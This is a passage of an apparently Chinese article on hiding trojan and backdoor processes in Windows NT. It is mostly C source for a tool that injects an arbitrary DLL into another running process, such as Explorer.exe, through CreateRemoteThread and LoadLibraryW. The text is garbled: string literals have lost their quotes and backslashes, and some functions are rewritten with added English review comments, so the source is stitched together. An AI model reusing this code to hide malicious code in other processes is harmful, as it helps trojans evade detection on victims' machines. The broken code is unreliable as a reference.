木马/后门程序在WINNT中进程隐藏及查找的方法
_ACP, MB_ERR_INVALID_CHARS,
lpDllFullPathName, strlen(lpDllFullPathName),
pszLibFileName, MAX_PATH);
CheckError(iReturnCode, 0, MultByteToWideChar);
//输出最后的操作参数
wprintf(LWill inject %s, pszLibFileName);
printf( into process:%s PID=%dn, argv[1], dwRemoteProcessId);
}
//打开远程进程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
PROCESS_VM_OPERATION | //允许VM操作
PROCESS_VM_WRITE, //允许VM写
FALSE, dwRemoteProcessId );
CheckError( (int) hRemoteProcess, NULL,
Remote Process not Exist or Access Denied!);
//计算DLL路径名需要的内存空间
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,
MEM_COMMIT, PAGE_READWRITE);
CheckError((int)pszLibFileRemote, NULL, VirtualAllocEx);
//将DLL的路径名复制到远程进程的内存空间
iReturnCode = WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
CheckError(iReturnCode, false, WriteProcessMemory);
//计算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT(Kernel32)), LoadLibraryW);
CheckError((int)pfnStartAddr, NULL, GetProcAddress);
//启动远程线程,通过远程线程调用用户的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
CheckError((int)hRemoteThread, NULL, Create Remote Thread);
//等待远程线程退出
WaitForSingleObject(hRemoteThread, INFINITE);
//清场处理
if (pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
}//end of main()
//将进程名转换为PID的函数
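// Resolve a process image name to a PID.
// InputProcessName: image base name (e.g. "Explorer.exe"), compared
//                   case-insensitively against the name of each process's
//                   first module.
// Returns the PID of the first matching process, or 0 when no process
// matched or EnumProcesses() itself failed. Processes the caller cannot open
// with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ are skipped silently, so a
// 0 result does not prove the process is absent.
// NOTE(review): aProcesses[] is a fixed 1024-entry buffer; EnumProcesses()
// never reports more than fits, so on a host with more processes the tail
// of the list is silently not searched - grow the buffer if that matters.
DWORD ProcessToPID(char *InputProcessName)
{
    DWORD aProcesses[1024], cbNeeded, cProcesses;
    DWORD dwFoundPid = 0;

    // aProcesses[] receives the PIDs of every process that could be enumerated
    if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return 0;
    cProcesses = cbNeeded / sizeof(DWORD);

    for ( unsigned int i = 0; i < cProcesses && dwFoundPid == 0; i++ )
    {
        HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                       FALSE, aProcesses[i] );
        if ( !hProcess ) continue;   // typically access denied on a system process

        HMODULE hMod;
        char szProcessName[MAX_PATH] = "UnknownProcess";
        // Only the first module is requested; its base name is used as the
        // process name, as in the original sample
        if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded ) )
        {
            // Only compare when a name was actually retrieved, so a caller
            // asking for "UnknownProcess" cannot match the placeholder
            if ( GetModuleBaseName( hProcess, hMod,
                                    szProcessName, sizeof(szProcessName) ) != 0
                 && !_stricmp(szProcessName, InputProcessName) )
            {
                dwFoundPid = aProcesses[i];
            }
        }
        // Close every handle that was opened, matched or not: the original
        // only closed the handle on a match (leaking the rest) and then
        // closed a possibly stale/uninitialised hProcess after the loop
        CloseHandle( hProcess );
    }
    return dwFoundPid;
}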
//错误处理函数CheckError()
//如果iReturnCode等于iErrorCode,则输出pErrorMsg并退出
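// Abort the program when a Win32 call reported failure.
// iReturnCode: the value the call returned.
// iErrorCode:  the value that call returns on failure (0 / NULL / false).
// pErrorMsg:   label printed in front of GetLastError() on failure.
// When the two codes are equal the message is printed, the remote-process
// resources held in the file-scope globals (pszLibFileRemote, hRemoteThread,
// hRemoteProcess) are released and the process exits with a failure status;
// otherwise the function returns and the caller continues.
// NOTE(review): callers pass handles and pointers through an (int) cast; on a
// 64-bit build that truncates the value, so a valid handle whose low 32 bits
// happen to be zero would be reported as an error. Comparing the untruncated
// value (e.g. an intptr_t parameter) would avoid that.
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
    if (iReturnCode != iErrorCode)
        return;

    // GetLastError() returns a DWORD, so it is printed with %lu rather than %d
    printf("%s Error:%lu\n\n", pErrorMsg, (unsigned long) GetLastError());

    // Release whatever the injection had acquired so far
    if (pszLibFileRemote != NULL)
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
    if (hRemoteThread != NULL) CloseHandle(hRemoteThread);
    if (hRemoteProcess != NULL) CloseHandle(hRemoteProcess);

    // The original exited with 0, which made every failure look like success
    // to a script checking the exit status
    exit(EXIT_FAILURE);
}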
//使用方法说明函数usage()
void usage(char * pErrorMsg)
{
printf(%snn,pErrorMsg);
printf(ttRemote Process DLL by Shotgunn);
printf(tThis program can inject a DLL into remote processn);
printf(Email:n);
printf(tShotgun@Xici.Netn);
printf(HomePage:n);
printf(thttp://It.Xici.Netn);
printf(thttp://www.Patching.Netn);
printf(USAGE:n);
printf(tRmtDLL.exe PID[|ProcessName] DLLFullPathNamen);
printf(Example:n);
printf(tRmtDLL.exe 1024 C:WINNTSystem32MyDLL.dlln);
printf(tRmtDLL.exe Explorer.exe C:MyDLL.dlln);